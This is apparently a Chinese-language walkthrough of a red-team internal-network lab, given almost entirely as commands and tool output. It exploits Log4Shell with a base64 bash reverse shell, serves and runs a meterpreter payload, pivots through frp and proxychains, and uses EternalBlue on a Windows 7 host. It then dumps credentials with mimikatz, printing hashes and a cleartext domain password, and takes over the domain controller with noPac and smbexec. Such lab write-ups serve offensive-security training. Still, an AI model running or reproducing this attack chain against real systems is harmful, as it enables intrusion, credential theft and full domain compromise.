内网靶场 | 渗透攻击红队内网域渗透靶场-2

payload=${jndi:ldap://io1ctr.dnslog.cn/test}

curl 172.20.4.146:38080/hello -X POST -d 'payload=${jndi:ldap://io1ctr.dnslog.cn/test}'

java -jar JNDIExploit-2.0-SNAPSHOT.jar -i 172.20.4.16Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true[+] LDAP Server Start Listening on 1389...[+] HTTP Server Start Listening on 8080...

nc -lvnp 2222

bash -i >& /dev/tcp/172.20.4.153/2222 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuNC4xNTMvMjIyMiAwPiYx

payload=${jndi:ldap://172.20.4.153:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMjAuNC4xNTMvMjIyMiAwPiYx}

%252b# %25为%的URL编码# %2b为+的URL编码

payload=${jndi:ldap://172.20.4.153:1389/TomcatBypass/Command/Base64/YmFzaCAtaSA%252bJiAvZGV2L3RjcC8xNzIuMjAuNC4xNTMvMjIyMiAwPiYx}

ls / -a

cat /proc/self/cgroup

root@cc4ddedd1727:/demo# cat /proc/self/status |grep Capcat /proc/self/status |grep CapCapInh: 00000000a80425fbCapPrm: 00000000a80425fbCapEff: 00000000a80425fbCapBnd: 00000000a80425fbCapAmb: 0000000000000000

history

saul@ubantu:~$ ifconfigdocker0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255        inet6 fe80::42:73ff:fe04:9380  prefixlen 64  scopeid 0x20<link>        ether 02:42:73:04:93:80  txqueuelen 0  (以太网)        RX packets 1261  bytes 209556 (209.5 KB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 1115  bytes 579027 (579.0 KB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 172.20.4.146  netmask 255.255.252.0  broadcast 172.20.7.255        inet6 fe80::ef82:7216:f2f7:4513  prefixlen 64  scopeid 0x20<link>        ether 00:0c:29:8b:87:63  txqueuelen 1000  (以太网)        RX packets 379040  bytes 26105962 (26.1 MB)        RX errors 0  dropped 3  overruns 0  frame 0        TX packets 147717  bytes 9097485 (9.0 MB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0ens38: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet 10.0.1.6  netmask 255.255.255.255  broadcast 10.0.1.6        inet6 fe80::aaea:89b9:79db:6b9c  prefixlen 64  scopeid 0x20<link>        ether 00:0c:29:8b:87:6d  txqueuelen 1000  (以太网)        RX packets 442  bytes 35349 (35.3 KB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 70  bytes 7746 (7.7 KB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536        inet 127.0.0.1  netmask 255.0.0.0        inet6 ::1  prefixlen 128  scopeid 0x10<host>        loop  txqueuelen 1000  (本地环回)        RX packets 483  bytes 58742 (58.7 KB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 483  bytes 58742 (58.7 KB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0veth94a6d8d: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500        inet6 fe80::249c:25ff:fe0f:7adf  prefixlen 64  scopeid 0x20<link>        ether 26:9c:25:0f:7a:df  txqueuelen 0  (以太网)        RX packets 1261  bytes 227210 (227.2 KB)        RX errors 0  dropped 0  overruns 0  frame 0        TX packets 1154  bytes 583247 (583.2 KB)        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

sudo -l# 或者grep -Po '^sudo.+:K.*$' /etc/group

for i in 10.0.1.{1..254}; do if ping -c 3 -w 3 $i &>/dev/null; then echo $i Find the target; fi; done

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=172.20.4.153  LPORT=1111 -f elf > 1111.elf

python3 -m http.server 80

wget http://172.20.4.153/1111.elf

chmod +x 1111.elf

msf6 > use exploit/multi/handlermsf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcpmsf6 exploit(multi/handler) > set lhost 172.20.4.153msf6 exploit(multi/handler) > set lport 1111msf6 exploit(multi/handler) > run

sudo ./1111.elf

[common]server_addr = 172.20.4.153server_port = 7000[plugin_socks]type = tcpremote_port = 1080plugin = socks5

frps -c frps.ini

[common]bind_addr = 0.0.0.0bind_port = 7000

frpc -c frpc.ini

msf6 > setg Proxies socks5:172.20.4.153:1080msf6 > setg ReverseAllowProxy true

proxychains4 nmap -v -Pn -T3 -sV -n -sT --open 10.0.1.7......Nmap scan report for 10.0.1.7Host is up (0.0054s latency).Not shown: 992 closed tcp ports (conn-refused)PORT      STATE SERVICE      VERSION135/tcp   open  msrpc        Microsoft Windows RPC139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: REDTEAM)49152/tcp open  msrpc        Microsoft Windows RPC49153/tcp open  msrpc        Microsoft Windows RPC49154/tcp open  msrpc        Microsoft Windows RPC49155/tcp open  msrpc        Microsoft Windows RPC49156/tcp open  msrpc        Microsoft Windows RPCService Info: Host: WIN7; OS: Windows; CPE: cpe:/o:microsoft:windows......

meterpreter > background msf6 > use auxiliary/scanner/smb/smb_versionmsf6 auxiliary(scanner/smb/smb_version) > set rhost 10.0.1.7msf6 auxiliary(scanner/smb/smb_version) > set THREADS 20msf6 auxiliary(scanner/smb/smb_version) > run

msf6 > use exploit/windows/smb/ms17_010_eternalbluemsf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcpmsf6 exploit(windows/smb/ms17_010_eternalblue) > set rhosts 10.0.1.7msf6 exploit(windows/smb/ms17_010_eternalblue) > set lport 2222msf6 exploit(windows/smb/ms17_010_eternalblue) > run[*] 10.0.1.7:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check[+] 10.0.1.7:445          - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)[*] 10.0.1.7:445          - Scanned 1 of 1 hosts (100% complete)[+] 10.0.1.7:445 - The target is vulnerable.[*] 10.0.1.7:445 - Connecting to target for exploitation.[+] 10.0.1.7:445 - Connection established for exploitation.[+] 10.0.1.7:445 - Target OS selected valid for OS indicated by SMB reply[*] 10.0.1.7:445 - CORE raw buffer dump (38 bytes)[*] 10.0.1.7:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima[*] 10.0.1.7:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service [*] 10.0.1.7:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          [+] 10.0.1.7:445 - Target arch selected valid for arch indicated by DCE/RPC reply[*] 10.0.1.7:445 - Trying exploit with 12 Groom Allocations.[*] 10.0.1.7:445 - Sending all but last fragment of exploit packet[*] 10.0.1.7:445 - Starting non-paged pool grooming[+] 10.0.1.7:445 - Sending SMBv2 buffers[+] 10.0.1.7:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.[*] 10.0.1.7:445 - Sending final SMBv2 buffers.[*] 10.0.1.7:445 - Sending last fragment of exploit packet![*] 10.0.1.7:445 - Receiving response from exploit packet[+] 10.0.1.7:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)![*] 10.0.1.7:445 - Sending egg to corrupted connection.[*] 10.0.1.7:445 - Triggering free of corrupted buffer.[*] Started bind TCP handler against 10.0.1.7:2222[*] Sending stage (201798 bytes) to 10.0.1.7[*] Meterpreter session 2 opened (172.20.4.153:36881 -> 172.20.4.153:1080) at 2024-03-26 21:41:40 +0800[+] 10.0.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.0.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=[+] 10.0.1.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=meterpreter > getuidServer username: NT AUTHORITYSYSTEMmeterpreter > sysinfoComputer        : WIN7OS              : Windows 7 (6.1 Build 7601, Service Pack 1).Architecture    : x64System Language : zh_CNDomain          : REDTEAMLogged On Users : 3Meterpreter     : x64/windows

meterpreter > shellProcess 3068 created.Channel 1 created.Microsoft Windows [�汾 6.1.7601]��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:Windowssystem32>chcp 65001chcp 65001Active code page: 65001C:Windowssystem32>type C:UsersrootDesktopflag.txttype C:UsersrootDesktopflag.txtflag{redteam.lab-2}

C:Windowssystem32>ipconfig /allipconfig /allWindows IP Configuration   Host Name . . . . . . . . . . . . : win7   Primary Dns Suffix  . . . . . . . : redteam.lab   Node Type . . . . . . . . . . . . : Hybrid   IP Routing Enabled. . . . . . . . : No   WINS Proxy Enabled. . . . . . . . : No   DNS Suffix Search List. . . . . . : redteam.labEthernet adapter �������� 2:   Connection-specific DNS Suffix  . :    Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection #2   Physical Address. . . . . . . . . : 00-0C-29-41-6F-CB   DHCP Enabled. . . . . . . . . . . : No   Autoconfiguration Enabled . . . . : Yes   Link-local IPv6 Address . . . . . : fe80::8892:5d29:728e:423d%13(Preferred)    IPv4 Address. . . . . . . . . . . : 10.0.0.7(Preferred)    Subnet Mask . . . . . . . . . . . : 255.255.255.0   Default Gateway . . . . . . . . . : 10.0.0.1   DHCPv6 IAID . . . . . . . . . . . : 301993001   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-50-B1-94-00-0C-29-BC-36-44   DNS Servers . . . . . . . . . . . : 10.0.0.12   NetBIOS over Tcpip. . . . . . . . : EnabledEthernet adapter ��������:   Connection-specific DNS Suffix  . :    Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection   Physical Address. . . . . . . . . : 00-0C-29-41-6F-C1   DHCP Enabled. . . . . . . . . . . : No   Autoconfiguration Enabled . . . . : Yes   Link-local IPv6 Address . . . . . : fe80::9ce9:b7fa:afb2:f8ab%11(Preferred)    IPv4 Address. . . . . . . . . . . : 10.0.1.7(Preferred)    Subnet Mask . . . . . . . . . . . : 255.255.255.0   Default Gateway . . . . . . . . . : 10.0.1.1   DHCPv6 IAID . . . . . . . . . . . : 234884137   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-29-50-B1-94-00-0C-29-BC-36-44   DNS Servers . . . . . . . . . . . : 10.0.1.7   NetBIOS over Tcpip. . . . . . . . : EnabledTunnel adapter isatap.{88DB6121-0924-4160-B2C6-608488C461A8}:   Media State . . . . . . . . . . . : Media disconnected   Connection-specific DNS Suffix  . :    Description . . . . . . . . . . . : Microsoft ISATAP Adapter   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0   DHCP Enabled. . . . . . . . . . . : No   Autoconfiguration Enabled . . . . : YesTunnel adapter isatap.{8D95A122-4FF1-4BCD-B20F-F04CD81A7E1E}:   Media State . . . . . . . . . . . : Media disconnected   Connection-specific DNS Suffix  . :    Description . . . . . . . . . . . : Microsoft ISATAP Adapter #2   Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0   DHCP Enabled. . . . . . . . . . . : No   Autoconfiguration Enabled . . . . : Yes

meterpreter > load kiwi Loading extension kiwi...  .#####.   mimikatz 2.2.0 20191125 (x64/windows) .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo) ## /  ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] ) ##  / ##       > http://blog.gentilkiwi.com/mimikatz '## v ##'        Vincent LE TOUX            ( [email protected] )  '#####'         > http://pingcastle.com / http://mysmartlogon.com  ***/Success.meterpreter > creds_all[+] Running as SYSTEM[*] Retrieving all credentialsmsv credentials===============Username  Domain   LM                                NTLM                              SHA1--------  ------   --                                ----                              ----WIN7$     REDTEAM                                    ac9018bcd329a8f4c85026b33d5bafa0  d7658d331b07b9a1da6cd48a833e37d925cf4029hong      win7     aad3b435b51404eeaad3b435b51404ee  31d6cfe0d16ae931b73c59d7e0c089c0  da39a3ee5e6b4b0d3255bfef95601890afd80709root      REDTEAM  f772a42242b3f72c9c5014ae4718a7ee  41ed68671702fa84d38084b5d60cc33d  361dc644072bfbda76ae5690919f65bb6b36e0d8wdigest credentials===================Username  Domain   Password--------  ------   --------(null)    (null)   (null)WIN7$     REDTEAM  ad fe 06 46 d0 be 3a 9d 15 74 99 ca e2 b1 a6 49 1c 4c ed 48 ca 01 ac fa 29 26 0e 4c 3d ca 19 53 66 0c 1b ca c7 81 78 d8 77 9d 0d 45 ab 90 1f 77 88 41 09 ea ba fd 4b 7c                   65 55 9f d6 da 7f 01 18 18 6f 09 1d d8 e3 a0 75 df 74 f7 32 f3 c7 ef ea 40 c9 1f b6 11 24 3e 61 6c a5 f9 e8 ea 73 8c 05 0c 46 89 e4 96 fb 50 00 b7 cd a4 e5 9a 57 d1 9c                   60 47 ef f8 27 23 b9 35 3f e5 3e 02 ad 52 9f 99 8a 7e dc 5a d1 68 e5 51 80 b1 1f 41 b0 38 fd b7 71 97 34 41 88 3a 03 80 e6 ae 1b 77 e4 80 43 41 6d b0 f5 76 1a 2b 73 17                   8d 94 83 c1 ab ab 26 3b 10 b3 d2 b8 2d a1 42 f1 74 dc 0f 83 23 8c 05 61 6a 3d a6 78 28 7d 03 2f 29 b7 73 00 fc 16 1b 79 0b f4 32 b5 61 9c 57 dd 87 7e cc 4e a8 5f 20 ce                   ee 1d f1 0e bb e0 be 4a 49 78 c2 2e 81 ae ea f3hong      win7     (null)root      REDTEAM  Red12345tspkg credentials=================Username  Domain   Password--------  ------   --------hong      win7     (null)root      REDTEAM  Red12345kerberos credentials====================Username  Domain       Password--------  ------       --------(null)    (null)       (null)hong      win7         (null)root      REDTEAM.LAB  Red12345win7$     REDTEAM.LAB  ad fe 06 46 d0 be 3a 9d 15 74 99 ca e2 b1 a6 49 1c 4c ed 48 ca 01 ac fa 29 26 0e 4c 3d ca 19 53 66 0c 1b ca c7 81 78 d8 77 9d 0d 45 ab 90 1f 77 88 41 09 ea ba fd 4b                        7c 65 55 9f d6 da 7f 01 18 18 6f 09 1d d8 e3 a0 75 df 74 f7 32 f3 c7 ef ea 40 c9 1f b6 11 24 3e 61 6c a5 f9 e8 ea 73 8c 05 0c 46 89 e4 96 fb 50 00 b7 cd a4 e5 9a 5                       7 d1 9c 60 47 ef f8 27 23 b9 35 3f e5 3e 02 ad 52 9f 99 8a 7e dc 5a d1 68 e5 51 80 b1 1f 41 b0 38 fd b7 71 97 34 41 88 3a 03 80 e6 ae 1b 77 e4 80 43 41 6d b0 f5 76                       1a 2b 73 17 8d 94 83 c1 ab ab 26 3b 10 b3 d2 b8 2d a1 42 f1 74 dc 0f 83 23 8c 05 61 6a 3d a6 78 28 7d 03 2f 29 b7 73 00 fc 16 1b 79 0b f4 32 b5 61 9c 57 dd 87 7e cc                        4e a8 5f 20 ce ee 1d f1 0e bb e0 be 4a 49 78 c2 2e 81 ae ea f3

meterpreter > upload fscan.exe[*] Uploading  : /root/桌面/fscan.exe -> fscan.exe[*] Uploaded 5.18 MiB of 5.18 MiB (100.0%): /root/桌面/fscan.exe -> fscan.exe[*] Completed  : /root/桌面/fscan.exe -> fscan.exemeterpreter > shellProcess 3016 created.Channel 3 created.Microsoft Windows [�汾 6.1.7601]��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����C:Windowssystem32>chcp 65001chcp 65001Active code page: 65001C:Windowssystem32>fscan.exe -h 10.0.0.0/24fscan.exe -h 10.0.0.0/24   ___                              _      / _      ___  ___ _ __ __ _  ___| | __  / /_/____/ __|/ __| '__/ _` |/ __| |/ // /_\_______  (__| | | (_| | (__|   <    ____/     |___/___|_|  __,_|___|_|_                        fscan version: 1.8.1start infoscan(icmp) Target 10.0.0.7        is alive(icmp) Target 10.0.0.12       is alive[*] Icmp alive hosts len is: 210.0.0.7:139 open10.0.0.7:135 open10.0.0.12:88 open10.0.0.12:445 open10.0.0.7:445 open10.0.0.12:139 open10.0.0.12:135 open[*] alive ports len is: 7start vulscan[+] 10.0.0.7    MS17-010        (Windows 7 Ultimate 7601 Service Pack 1)[+] NetInfo:[*]10.0.0.7   [->]win7   [->]10.0.1.7   [->]10.0.0.7[+] NetInfo:[*]10.0.0.12   [->]DC   [->]10.0.0.12[*] 10.0.0.7             __MSBROWSE__WIN7              Windows 7 Ultimate 7601 Service Pack 1[+] 10.0.0.12   MS17-010        (Windows Server 2012 R2 Datacenter 9600)[*] 10.0.0.12      [+]DC REDTEAMDC                Windows Server 2012 R2 Datacenter 9600已完成 7/7[*] 扫描结束,耗时: 9.0503873s

meterpreter > run get_local_subnets[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...]Local subnet: 10.0.0.0/255.255.255.0Local subnet: 10.0.1.0/255.255.255.0......meterpreter > run autoroute -s 10.0.0.0/24[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...][*] Adding a route to 10.0.0.0/255.255.255.0...[+] Added route to 10.0.0.0/255.255.255.0 via 10.0.1.7[*] Use the -p option to list all active routesmeterpreter > run autoroute -p[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...]Active Routing Table====================   Subnet             Netmask            Gateway   ------             -------            -------   10.0.0.0           255.255.255.0      Session 2

msf6 > use auxiliary/server/socks_proxy# 将端口设为1081，因为1080端口被frp的socks5代理占用msf6 auxiliary(server/socks_proxy) > set srvport 1081msf6 auxiliary(server/socks_proxy) > run

vim /etc/proxychains4.conf# 在最下面添加socks5 172.20.4.153 1081

proxychains4 python3 sam_the_admin.py "redteam/root:Red12345" -dc-ip 10.0.0.12 -shell[proxychains] config file found: /etc/proxychains4.conf[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[proxychains] DLL init: proxychains-ng 4.17Impacket v0.11.0 - Copyright 2023 Fortra[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:389  ...  OK[-] WARNING: Target host is not a DC[*] Selected Target dc.redteam.lab[*] Total Domain Admins 1[*] will try to impersonate Administrator[*] Current ms-DS-MachineAccountQuota = 10[*] Adding Computer Account "SAMTHEADMIN-34$"[*] MachineAccount "SAMTHEADMIN-34$" password = JS6Kp%FldoHZ[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:135  ...  OK[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:445  ...  OK[*] Successfully added machine account SAMTHEADMIN-34$ with password JS6Kp%FldoHZ.[*] SAMTHEADMIN-34$ object = CN=SAMTHEADMIN-34,CN=Computers,DC=redteam,DC=lab[*] SAMTHEADMIN-34$ sAMAccountName == dc[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:88  ...  OK[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:88  ...  OK[*] Saving ticket in dc.ccache[*] Resting the machine account to SAMTHEADMIN-34$[*] Restored SAMTHEADMIN-34$ sAMAccountName to original value[*] Using TGT from cache[*] Impersonating Administrator[*]     Requesting S4U2self[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:88  ...  OK[*] Saving ticket in Administrator.ccache[proxychains] DLL init: proxychains-ng 4.17[proxychains] DLL init: proxychains-ng 4.17[proxychains] DLL init: proxychains-ng 4.17[proxychains] DLL init: proxychains-ng 4.17Impacket v0.11.0 - Copyright 2023 Fortra[proxychains] Dynamic chain  ...  172.20.4.153:1081  ...  10.0.0.12:445  ...  OK[-] The NETBIOS connection with the remote host timed out.[*] You can deploy a shell when you want using the following command:[$] KRB5CCNAME='Administrator.ccache' /usr/bin/impacket-smbexec -target-ip 10.0.0.12 -dc-ip 10.0.0.12 -k -no-pass @'dc.redteam.lab'

# 导入凭据export KRB5CCNAME=Administrator.ccache# 获取shellproxychains4 python3 smbexec.py -target-ip 10.0.0.12 -dc-ip 10.0.0.12 -k -no-pass @'dc.redteam.lab'

type c:usersadministratordesktopflag.txt